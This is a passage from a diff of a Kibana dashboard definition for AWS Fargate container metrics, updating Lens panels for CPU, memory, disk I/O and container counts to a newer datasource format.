"last_value", + "isBucketed": false, + "scale": "ratio", + "sourceField": "awsfargate.task_stats.cpu.total.norm.pct", + "filter": { + "query": "\"awsfargate.task_stats.cpu.total.norm.pct\": *", + "language": "kuery" }, - { - "columnId": "b1e08425-6a1e-4db6-bb47-a65167b7e14f" + "params": { + "sortField": "@timestamp", + "format": { + "id": "percent", + "params": { + "decimals": 2 + } + } }, - { - "columnId": "09de0d9e-c174-46cf-bdc8-50158475b4a7" + "customLabel": true + }, + "7626706b-6efa-4fe7-b45c-6e9afa07f982": { + "label": "Memory Usage", + "dataType": "number", + "operationType": "last_value", + "isBucketed": false, + "scale": "ratio", + "sourceField": "awsfargate.task_stats.memory.usage.total", + "filter": { + "query": "\"awsfargate.task_stats.memory.usage.total\": *", + "language": "kuery" }, - { - "columnId": "e0782143-0636-43b4-8fac-b857ea5282b2" + "params": { + "sortField": "@timestamp", + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + } }, - { - "columnId": "7626706b-6efa-4fe7-b45c-6e9afa07f982" + "customLabel": true + }, + "e0782143-0636-43b4-8fac-b857ea5282b2": { + "label": "DiskIO Write", + "dataType": "number", + "operationType": "last_value", + "isBucketed": false, + "scale": "ratio", + "sourceField": "awsfargate.task_stats.diskio.write.bytes", + "filter": { + "query": "\"awsfargate.task_stats.diskio.write.bytes\": *", + "language": "kuery" }, - { - "columnId": "441ceb32-53e7-4408-9638-6dfd38202144" - } - ], - "layerId": "e350c9e6-e6b7-40f1-83ed-94a38ed9467a", - "layerType": "data", - "rowHeight": "single", - "rowHeightLines": 1 - } - }, - "title": "Container Table [Metrics AWSFargate]", - "visualizationType": "lnsDatatable" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 14, - "i": "735a25cb-f781-4a8b-99e6-2adf582f8a37", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "735a25cb-f781-4a8b-99e6-2adf582f8a37", - "title": "Containers", - "type": "lens", - "version": "8.3.0" - }, - { - 
"embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-450490b7-c7f9-42bf-8e7d-227cbf960e94", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "450490b7-c7f9-42bf-8e7d-227cbf960e94": { - "columnOrder": [ - "b20aebaf-7126-4b1c-acca-79cfa113b44d", - "915eda3d-00ce-40d0-ada8-4eb372202b42" - ], - "columns": { - "915eda3d-00ce-40d0-ada8-4eb372202b42": { - "dataType": "number", - "isBucketed": false, - "label": "Unique count of container.id", - "operationType": "unique_count", - "scale": "ratio", - "sourceField": "container.id" - }, - "b20aebaf-7126-4b1c-acca-79cfa113b44d": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - } + "params": { + "sortField": "@timestamp", + "format": { + "id": "bytes", + "params": { + "decimals": 2 } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "915eda3d-00ce-40d0-ada8-4eb372202b42" + } + }, + "customLabel": true + }, + "eb452b61-bf12-46c0-afae-c0f1c776156c": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Container Name", + "operationType": "terms", + "params": { + "orderBy": { + "type": "alphabetical" + }, + "orderDirection": "asc", + "parentFormat": { + "id": "terms" + }, + "size": 20 + }, + "scale": "ordinal", + "sourceField": "container.name" + }, + 
"c3bebf6b-2327-4780-93c5-7eaa5da9e136": { + "label": "Container ID", + "dataType": "string", + "operationType": "terms", + "scale": "ordinal", + "sourceField": "container.id", + "isBucketed": true, + "params": { + "size": 100, + "orderBy": { + "type": "column", + "columnId": "09de0d9e-c174-46cf-bdc8-50158475b4a7" + }, + "orderDirection": "desc", + "otherBucket": true, + "missingBucket": false, + "parentFormat": { + "id": "terms" + }, + "include": [], + "exclude": [], + "includeIsRegex": false, + "excludeIsRegex": false + }, + "customLabel": true + }, + "be5220e6-b8d6-4453-aa6d-c23115fd5a79X0": { + "label": "Part of Hard Memory Limit", + "dataType": "number", + "operationType": "last_value", + "isBucketed": false, + "scale": "ratio", + "sourceField": "awsfargate.task_stats.memory_hard_limit", + "filter": { + "query": "\"awsfargate.task_stats.memory_hard_limit\": *", + "language": "kuery" + }, + "params": { + "sortField": "@timestamp" + }, + "customLabel": true + }, + "be5220e6-b8d6-4453-aa6d-c23115fd5a79X1": { + "label": "Part of Hard Memory Limit", + "dataType": "number", + "operationType": "math", + "isBucketed": false, + "scale": "ratio", + "params": { + "tinymathAst": { + "type": "function", + "name": "divide", + "args": [ + "be5220e6-b8d6-4453-aa6d-c23115fd5a79X0", + 1024 ], - "layerId": "450490b7-c7f9-42bf-8e7d-227cbf960e94", - "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "xAccessor": "b20aebaf-7126-4b1c-acca-79cfa113b44d" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" + "location": { + "min": 0, + "max": 110 + }, + "text": "last_value(awsfargate.task_stats.memory_hard_limit, kql='\"awsfargate.task_stats.memory_hard_limit\": *') / 1024" + } + }, + "references": [ + "be5220e6-b8d6-4453-aa6d-c23115fd5a79X0" + ], + "customLabel": true + }, + "be5220e6-b8d6-4453-aa6d-c23115fd5a79": { + "label": "Hard Memory Limit", + "dataType": "number", + "operationType": 
"formula", + "isBucketed": false, + "scale": "ratio", + "params": { + "formula": "last_value(awsfargate.task_stats.memory_hard_limit, kql='\"awsfargate.task_stats.memory_hard_limit\": *') / 1024", + "isFormulaBroken": false, + "format": { + "id": "number", + "params": { + "decimals": 2, + "suffix": "GB" + } + } + }, + "references": [ + "be5220e6-b8d6-4453-aa6d-c23115fd5a79X1" + ], + "customLabel": true + }, + "698193ae-8b08-4c27-ac8d-8db3b79c667f": { + "label": "Max Memory Usage", + "dataType": "number", + "operationType": "max", + "sourceField": "awsfargate.task_stats.memory.usage.total", + "isBucketed": false, + "scale": "ratio", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + } + }, + "customLabel": true + } }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - } + "incompleteColumns": {} + } } + } }, - "title": "Total Number of Containers [Metrics AWSFargate]", - "visualizationType": "lnsXY" + "internalReferences": [], + "adHocDataViews": {} + } }, "enhancements": {}, "hidePanelTitles": false + }, + "title": "Containers" }, - "gridData": { + { + "type": "lens", + "gridData": { "h": 15, - "i": "5d4537e8-9aee-47e6-8580-1961d8a3a38e", + "i": "e609f80a-d1b2-4820-a896-a8a68a731ed0", "w": 24, "x": 0, "y": 14 - }, - "panelIndex": "5d4537e8-9aee-47e6-8580-1961d8a3a38e", - "title": "Total Number of Containers", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { + }, + "panelIndex": "e609f80a-d1b2-4820-a896-a8a68a731ed0", + "embeddableConfig": { "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-82f43ff6-6ac1-4f73-b532-61b6b9fe15b0", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - 
"82f43ff6-6ac1-4f73-b532-61b6b9fe15b0": { - "columnOrder": [ - "e139ccbc-54ff-4921-b345-e3c3ff6a9efc", - "d7b9836e-d606-4aab-b2d8-44cbc726a950" - ], - "columns": { - "d7b9836e-d606-4aab-b2d8-44cbc726a950": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "CPU Utilization", - "operationType": "average", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - } - }, - "scale": "ratio", - "sourceField": "awsfargate.task_stats.cpu.total.norm.pct" - }, - "e139ccbc-54ff-4921-b345-e3c3ff6a9efc": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Cluster Name", - "operationType": "terms", - "params": { - "orderBy": { - "columnId": "d7b9836e-d606-4aab-b2d8-44cbc726a950", - "type": "column" - }, - "orderDirection": "desc", - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": "ordinal", - "sourceField": "awsfargate.task_stats.cluster_name" - } - } - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "d7b9836e-d606-4aab-b2d8-44cbc726a950" - ], - "layerId": "82f43ff6-6ac1-4f73-b532-61b6b9fe15b0", - "layerType": "data", - "seriesType": "bar_horizontal", - "xAccessor": "e139ccbc-54ff-4921-b345-e3c3ff6a9efc" - } + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-450490b7-c7f9-42bf-8e7d-227cbf960e94", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "metrics-*", + "layers": { + "450490b7-c7f9-42bf-8e7d-227cbf960e94": { + "columnOrder": [ + "b20aebaf-7126-4b1c-acca-79cfa113b44d", + "915eda3d-00ce-40d0-ada8-4eb372202b42" ], - "legend": { - "isVisible": true, - 
"legendSize": "auto", - "position": "right" + "columns": { + "915eda3d-00ce-40d0-ada8-4eb372202b42": { + "dataType": "number", + "isBucketed": false, + "label": "Unique count of container.id", + "operationType": "unique_count", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "container.id" + }, + "b20aebaf-7126-4b1c-acca-79cfa113b44d": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } }, - "preferredSeriesType": "bar_horizontal", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - } + "indexPatternId": "metrics-*" + } } + } }, - "title": "CPU Utilization Per Cluster [Metrics AWSFargate]", - "visualizationType": "lnsXY" + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "915eda3d-00ce-40d0-ada8-4eb372202b42" + ], + "layerId": "450490b7-c7f9-42bf-8e7d-227cbf960e94", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "b20aebaf-7126-4b1c-acca-79cfa113b44d" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + } + } + }, + "title": "Total Number of Containers [Metrics AWSFargate]", + "type": "lens", + "visualizationType": "lnsXY" }, "enhancements": {}, "hidePanelTitles": false + }, + "title": "Total Number of Containers" }, - "gridData": { + { + "type": "lens", + "gridData": { 
"h": 15, - "i": "d3c9208e-c699-4514-a091-a731d28ab9af", + "i": "3607122f-df09-4aa9-b42c-8f58d334e7c8", "w": 24, "x": 24, "y": 14 - }, - "panelIndex": "d3c9208e-c699-4514-a091-a731d28ab9af", - "title": "CPU Utilization Per Cluster", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { + }, + "panelIndex": "3607122f-df09-4aa9-b42c-8f58d334e7c8", + "embeddableConfig": { "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-e350c9e6-e6b7-40f1-83ed-94a38ed9467a", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "e350c9e6-e6b7-40f1-83ed-94a38ed9467a": { - "columnOrder": [ - "55121be2-80f6-407c-9352-3e13705ac860", - "eb452b61-bf12-46c0-afae-c0f1c776156c", - "5b846eff-5ca7-45b0-b4c2-0346e9986302" - ], - "columns": { - "55121be2-80f6-407c-9352-3e13705ac860": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "10s" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "5b846eff-5ca7-45b0-b4c2-0346e9986302": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Container Memory Usage Pct", - "operationType": "average", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - } - }, - "scale": "ratio", - "sourceField": "awsfargate.task_stats.memory.usage.pct" - }, - "eb452b61-bf12-46c0-afae-c0f1c776156c": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "container identifier", - "operationType": "terms", - "params": { - "orderBy": { - "columnId": "5b846eff-5ca7-45b0-b4c2-0346e9986302", - "type": "column" - }, - "orderDirection": "desc", - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": 
"ordinal", - "sourceField": "awsfargate.task_stats.identifier" - } - } - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "5b846eff-5ca7-45b0-b4c2-0346e9986302" - ], - "layerId": "e350c9e6-e6b7-40f1-83ed-94a38ed9467a", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "eb452b61-bf12-46c0-afae-c0f1c776156c", - "xAccessor": "55121be2-80f6-407c-9352-3e13705ac860" - } + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-82f43ff6-6ac1-4f73-b532-61b6b9fe15b0", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "82f43ff6-6ac1-4f73-b532-61b6b9fe15b0": { + "columnOrder": [ + "e139ccbc-54ff-4921-b345-e3c3ff6a9efc", + "d7b9836e-d606-4aab-b2d8-44cbc726a950" ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true + "columns": { + "d7b9836e-d606-4aab-b2d8-44cbc726a950": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "CPU Utilization", + "operationType": "average", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "awsfargate.task_stats.cpu.total.norm.pct" + }, + "e139ccbc-54ff-4921-b345-e3c3ff6a9efc": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Cluster Name", + "operationType": "terms", + "params": { + 
"orderBy": { + "columnId": "d7b9836e-d606-4aab-b2d8-44cbc726a950", + "type": "column" + }, + "orderDirection": "desc", + "parentFormat": { + "id": "terms" + }, + "size": 20 + }, + "scale": "ordinal", + "sourceField": "awsfargate.task_stats.cluster_name" + } } + } } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" }, - "title": "Container Memory Usage Pct [Metrics AWSFargate]", - "visualizationType": "lnsXY" + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "d7b9836e-d606-4aab-b2d8-44cbc726a950" + ], + "layerId": "82f43ff6-6ac1-4f73-b532-61b6b9fe15b0", + "layerType": "data", + "seriesType": "bar_horizontal", + "xAccessor": "e139ccbc-54ff-4921-b345-e3c3ff6a9efc" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "bar_horizontal", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + } + } + }, + "title": "CPU Utilization Per Cluster [Metrics AWSFargate]", + "visualizationType": "lnsXY" }, "enhancements": {}, "hidePanelTitles": false + }, + "title": "CPU Utilization Per Cluster" }, - "gridData": { + { + "type": "lens", + "gridData": { "h": 15, - "i": "9dd2b002-5170-49ea-afc2-30b0b46b0fd7", + "i": "18d073d9-fbd7-42fd-b157-4721e4c810d7", "w": 24, "x": 0, "y": 29 - }, - "panelIndex": "9dd2b002-5170-49ea-afc2-30b0b46b0fd7", - "title": "Container Memory Usage Pct", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { + }, + "panelIndex": "18d073d9-fbd7-42fd-b157-4721e4c810d7", + "embeddableConfig": { "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": 
"indexpattern-datasource-layer-0749cbce-4a88-471d-9715-9f4f54510864", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "0749cbce-4a88-471d-9715-9f4f54510864": { - "columnOrder": [ - "35481ca7-cebb-495c-974f-34ede5f3935c", - "33d4857c-800a-4854-9369-dbf019501bdd", - "ec425562-fe79-4326-b753-20b408c806fb" - ], - "columns": { - "33d4857c-800a-4854-9369-dbf019501bdd": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Container Identifier", - "operationType": "terms", - "params": { - "orderBy": { - "columnId": "ec425562-fe79-4326-b753-20b408c806fb", - "type": "column" - }, - "orderDirection": "desc", - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": "ordinal", - "sourceField": "awsfargate.task_stats.identifier" - }, - "35481ca7-cebb-495c-974f-34ede5f3935c": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "10s" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "ec425562-fe79-4326-b753-20b408c806fb": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Container CPU Total Norm Pct", - "operationType": "average", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - } - }, - "scale": "ratio", - "sourceField": "awsfargate.task_stats.cpu.total.norm.pct" - } - } - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "fittingFunction": "None", - "layers": [ - { - "accessors": [ - "ec425562-fe79-4326-b753-20b408c806fb" - ], - "layerId": "0749cbce-4a88-471d-9715-9f4f54510864", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "33d4857c-800a-4854-9369-dbf019501bdd", - "xAccessor": "35481ca7-cebb-495c-974f-34ede5f3935c" - } + "description": "", + "references": [ + { 
+ "id": "metrics-*", + "name": "indexpattern-datasource-layer-e350c9e6-e6b7-40f1-83ed-94a38ed9467a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "metrics-*", + "layers": { + "e350c9e6-e6b7-40f1-83ed-94a38ed9467a": { + "columnOrder": [ + "55121be2-80f6-407c-9352-3e13705ac860", + "eb452b61-bf12-46c0-afae-c0f1c776156c", + "5b846eff-5ca7-45b0-b4c2-0346e9986302" ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" + "columns": { + "55121be2-80f6-407c-9352-3e13705ac860": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "10s" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "5b846eff-5ca7-45b0-b4c2-0346e9986302": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Container Memory Usage", + "operationType": "average", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "awsfargate.task_stats.memory.usage.total" + }, + "eb452b61-bf12-46c0-afae-c0f1c776156c": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "container identifier", + "operationType": "terms", + "params": { + "orderBy": { + "columnId": "5b846eff-5ca7-45b0-b4c2-0346e9986302", + "type": "column" + }, + "orderDirection": "desc", + "parentFormat": { + "id": "terms" + }, + "size": 20 + }, + "scale": "ordinal", + "sourceField": "awsfargate.task_stats.identifier" + } }, - "preferredSeriesType": "line" + "indexPatternId": "metrics-*" + } } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" }, - "title": "Container CPU Total Norm Pct [Metrics AWSFargate]", - "visualizationType": "lnsXY" + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + 
"yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "5b846eff-5ca7-45b0-b4c2-0346e9986302" + ], + "layerId": "e350c9e6-e6b7-40f1-83ed-94a38ed9467a", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "eb452b61-bf12-46c0-afae-c0f1c776156c", + "xAccessor": "55121be2-80f6-407c-9352-3e13705ac860" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + } + } + }, + "title": "Container Memory Usage [Metrics AWSFargate]", + "type": "lens", + "visualizationType": "lnsXY" }, "enhancements": {}, "hidePanelTitles": false + }, + "title": "Container Memory Usage" }, - "gridData": { + { + "type": "lens", + "gridData": { "h": 15, - "i": "a7a6e425-98fd-4210-b3d5-005268be6274", + "i": "a435ccba-ec8b-4a5f-a74b-13eb9cc4e612", "w": 24, "x": 24, "y": 29 - }, - "panelIndex": "a7a6e425-98fd-4210-b3d5-005268be6274", - "title": "Container CPU Total Norm Pct", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { + }, + "panelIndex": "a435ccba-ec8b-4a5f-a74b-13eb9cc4e612", + "embeddableConfig": { "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-c8d70f88-6554-41ca-ac1e-a3cf8b992972", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "c8d70f88-6554-41ca-ac1e-a3cf8b992972": { - "columnOrder": [ - "0505d890-632e-4434-a68f-f019e7893eaf", - "989ce63a-7fcd-4c83-980b-d595a1dd2469", - "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b" - ], - "columns": { - "0505d890-632e-4434-a68f-f019e7893eaf": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of awsfargate.task_stats.identifier", - "operationType": "terms", - 
"params": { - "orderBy": { - "columnId": "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b", - "type": "column" - }, - "orderDirection": "desc", - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": "ordinal", - "sourceField": "awsfargate.task_stats.identifier" - }, - "989ce63a-7fcd-4c83-980b-d595a1dd2469": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "DiskIO Read", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "awsfargate.task_stats.diskio.read.bytes" - } - } - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b" - ], - "layerId": "c8d70f88-6554-41ca-ac1e-a3cf8b992972", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "0505d890-632e-4434-a68f-f019e7893eaf", - "xAccessor": "989ce63a-7fcd-4c83-980b-d595a1dd2469" - } + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-0749cbce-4a88-471d-9715-9f4f54510864", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "0749cbce-4a88-471d-9715-9f4f54510864": { + 
"columnOrder": [ + "35481ca7-cebb-495c-974f-34ede5f3935c", + "33d4857c-800a-4854-9369-dbf019501bdd", + "ec425562-fe79-4326-b753-20b408c806fb" ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true + "columns": { + "33d4857c-800a-4854-9369-dbf019501bdd": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Container Identifier", + "operationType": "terms", + "params": { + "orderBy": { + "columnId": "ec425562-fe79-4326-b753-20b408c806fb", + "type": "column" + }, + "orderDirection": "desc", + "parentFormat": { + "id": "terms" + }, + "size": 20 + }, + "scale": "ordinal", + "sourceField": "awsfargate.task_stats.identifier" + }, + "35481ca7-cebb-495c-974f-34ede5f3935c": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "10s" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "ec425562-fe79-4326-b753-20b408c806fb": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Container CPU Total Norm Pct", + "operationType": "average", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "awsfargate.task_stats.cpu.total.norm.pct" + } } + } } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" }, - "title": "DiskIO Read [Metrics AWSFargate]", - "type": "lens", - "visualizationType": "lnsXY" + "visualization": { + "fittingFunction": "None", + "layers": [ + { + "accessors": [ + "ec425562-fe79-4326-b753-20b408c806fb" + ], + "layerId": "0749cbce-4a88-471d-9715-9f4f54510864", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "33d4857c-800a-4854-9369-dbf019501bdd", + "xAccessor": 
"35481ca7-cebb-495c-974f-34ede5f3935c" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "line" + } + }, + "title": "Container CPU Total Norm Pct [Metrics AWSFargate]", + "visualizationType": "lnsXY" }, "enhancements": {}, "hidePanelTitles": false + }, + "title": "Container CPU Total Norm Pct" }, - "gridData": { + { + "type": "lens", + "gridData": { "h": 15, - "i": "d7a6623a-14cf-411c-ab73-ded3734a359b", + "i": "9131626b-0386-4f36-838d-0c5615e74279", "w": 24, "x": 0, "y": 44 - }, - "panelIndex": "d7a6623a-14cf-411c-ab73-ded3734a359b", - "title": "DiskIO Read", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { + }, + "panelIndex": "9131626b-0386-4f36-838d-0c5615e74279", + "embeddableConfig": { "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-c8d70f88-6554-41ca-ac1e-a3cf8b992972", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "c8d70f88-6554-41ca-ac1e-a3cf8b992972": { - "columnOrder": [ - "0505d890-632e-4434-a68f-f019e7893eaf", - "989ce63a-7fcd-4c83-980b-d595a1dd2469", - "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b" - ], - "columns": { - "0505d890-632e-4434-a68f-f019e7893eaf": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of awsfargate.task_stats.identifier", - "operationType": "terms", - "params": { - "orderBy": { - "columnId": "ab00dce2-6c01-4a0d-8d7c-71330afbaa3b", - "type": "column" - }, - "orderDirection": "desc", - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": "ordinal", - "sourceField": "awsfargate.task_stats.identifier" - }, - "989ce63a-7fcd-4c83-980b-d595a1dd2469": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - 
